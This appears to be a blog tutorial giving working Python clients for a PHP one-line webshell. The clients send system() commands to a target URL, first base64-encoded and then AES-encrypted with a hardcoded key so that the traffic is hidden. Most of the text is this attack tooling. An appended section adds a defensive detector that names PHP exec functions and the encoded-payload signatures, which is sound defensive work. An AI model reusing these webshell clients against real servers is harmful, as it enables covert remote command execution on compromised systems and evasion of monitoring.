Connecting to a PHP one-sentence Trojan with Python and encrypting the transmitted data

Editor: Python

I have written two articles before, but not much.

Using Python to connect to a JSP one-sentence Trojan
Using Burp Suite to capture Python's POST requests

I remembered them today, so I am combining them and adding encryption.

base64

First, write a "two-sentence" Trojan in the Linux virtual machine.

It runs base64 decoding on the parameter it receives, which means the Windows machine needs to base64-encode what it sends.

import requests
import base64

url = input('Target URL: ')  # http://192.168.xxx.xxx/shell.php
pwd = input('Connection password: ')  # In fact, it is the variable name used in the Trojan (shell)
# Proxy used so that Burp Suite can capture the request
proxy = {
    'http': '127.0.0.1:8080',
    'https': '127.0.0.1:8080'
}
while True:
    cmd = input('Enter the command to execute: ')
    send = "system('" + cmd + "');"
    connect = base64.b64encode(send.encode('utf-8'))
    # Pass the command to the one-sentence Trojan
    payloads = {
        pwd: connect
    }
    # Send a POST request to the target URL
    # response = requests.post(url, payloads)
    response = requests.post(url, payloads, proxies=proxy)
    # Echo the result of the command execution
    print(response.text)

The results are as follows:

Decode the captured value to see the command.

Then forward the packet, and the Python code receives the returned data.

AES

Modify shell.php.

The Python code is as follows:

import requests
import base64
from Crypto.Cipher import AES

# Key (key) and initialization vector (vi) for CBC-mode encryption
BLOCK_SIZE = 16  # Bytes
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * \
    chr(BLOCK_SIZE - len(s) % BLOCK_SIZE)
unpad = lambda s: s[:-ord(s[len(s) - 1:])]
key = '5c47c819bpt3apr0'
vi = '0102030405060708'

def AES_Encrypt(key, data):
    # Pad the string to a multiple of the block size
    data = pad(data)
    cipher = AES.new(key.encode('utf8'), AES.MODE_CBC, vi.encode('utf8'))
    encryptedbytes = cipher.encrypt(data.encode('utf8'))
    # Encryption yields bytes; Base64-encode them, which returns a byte string
    encodestrs = base64.b64encode(encryptedbytes)
    # Decode the byte string as UTF-8
    enctext = encodestrs.decode('utf8')
    return enctext

def AES_Decrypt(key, data):
    data = data.encode('utf8')
    # Base64-decode the encrypted data back into bytes
    encodebytes = base64.decodebytes(data)
    cipher = AES.new(key.encode('utf8'), AES.MODE_CBC, vi.encode('utf8'))
    text_decrypted = cipher.decrypt(encodebytes)
    # Remove the padding
    text_decrypted = unpad(text_decrypted)
    text_decrypted = text_decrypted.decode('utf8')
    print(text_decrypted)
    return text_decrypted

if __name__ == '__main__':
    url = input('Target URL: ')  # http://192.168.223.xxx.xxx/shell.php
    pwd = input('Connection password: ')  # In fact, it is the variable name used in the Trojan (shell)
    # Proxy used so that Burp Suite can capture the request
    proxy = {
        'http': '127.0.0.1:8080',
        'https': '127.0.0.1:8080'
    }
    while True:
        cmd = input('Enter the command to execute: ')
        send = "system('" + cmd + "');"
        # Pass the command to the one-sentence Trojan
        payloads = {
            pwd: AES_Encrypt(key, send)
        }
        # Send a POST request to the target URL
        # response = requests.post(url, payloads)
        response = requests.post(url, payloads, proxies=proxy)
        # Echo the result of the command execution
        print(response.text)

The code for these encryption and decryption algorithms is easy to find on the Internet.

You can also modify it yourself.

Results obtained after capturing the packets:

AES module installation

When using AES from Python on Windows, install the pycryptodome module:

pip install pycryptodome

When using AES from Python on Linux, install the pycrypto module:

pip install pycrypto
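
From the defender's side, both encodings described above leave a recognisable shape in the POST body: the base64 variant decodes to a PHP call such as system(...), and the AES variant is a base64 value that decodes to whole 16-byte blocks of non-printable data. The following is an added example, not code from the original article; the function names, the watch list of PHP functions and the sample request bodies are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlencode

# PHP functions that run code or OS commands (assumed watch list; extend as needed).
PHP_EXEC_CALL = re.compile(
    rb"^\s*(system|exec|passthru|shell_exec|popen|proc_open|eval|assert)\s*\(")
BLOCK = 16  # AES block size in bytes


def classify_value(value):
    """Return a finding label for one POST parameter value, or None."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None  # not base64 at all
    if PHP_EXEC_CALL.match(raw):
        return "base64-php-call"
    # Block-cipher output: whole 16-byte blocks, mostly non-printable bytes.
    printable = sum(32 <= b < 127 for b in raw)
    if raw and len(raw) % BLOCK == 0 and printable < 0.6 * len(raw):
        return "base64-block-ciphertext"
    return None


def scan_body(body):
    """Scan a form-encoded POST body; return [(parameter, label), ...]."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        label = classify_value(value)
        if label:
            findings.append((name, label))
    return findings


if __name__ == "__main__":
    # Constructed sample bodies (not captured traffic); "shell" is a made-up parameter.
    fake_ct = bytes(range(0x80, 0xA0))  # 32 bytes standing in for AES output
    samples = [
        urlencode({"shell": base64.b64encode(b"system('id');").decode()}),
        urlencode({"shell": base64.b64encode(fake_ct).decode()}),
        "user=alice&comment=hello",
    ]
    for body in samples:
        print(scan_body(body) or "clean", "<-", body)
```

Because the client always sends a string starting with system(', the base64 form always begins with c3lzdGVtKC, which works as a cheap prefilter in a WAF rule or log query. The block-ciphertext label is only a triage signal, since legitimate binary tokens can also match it.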
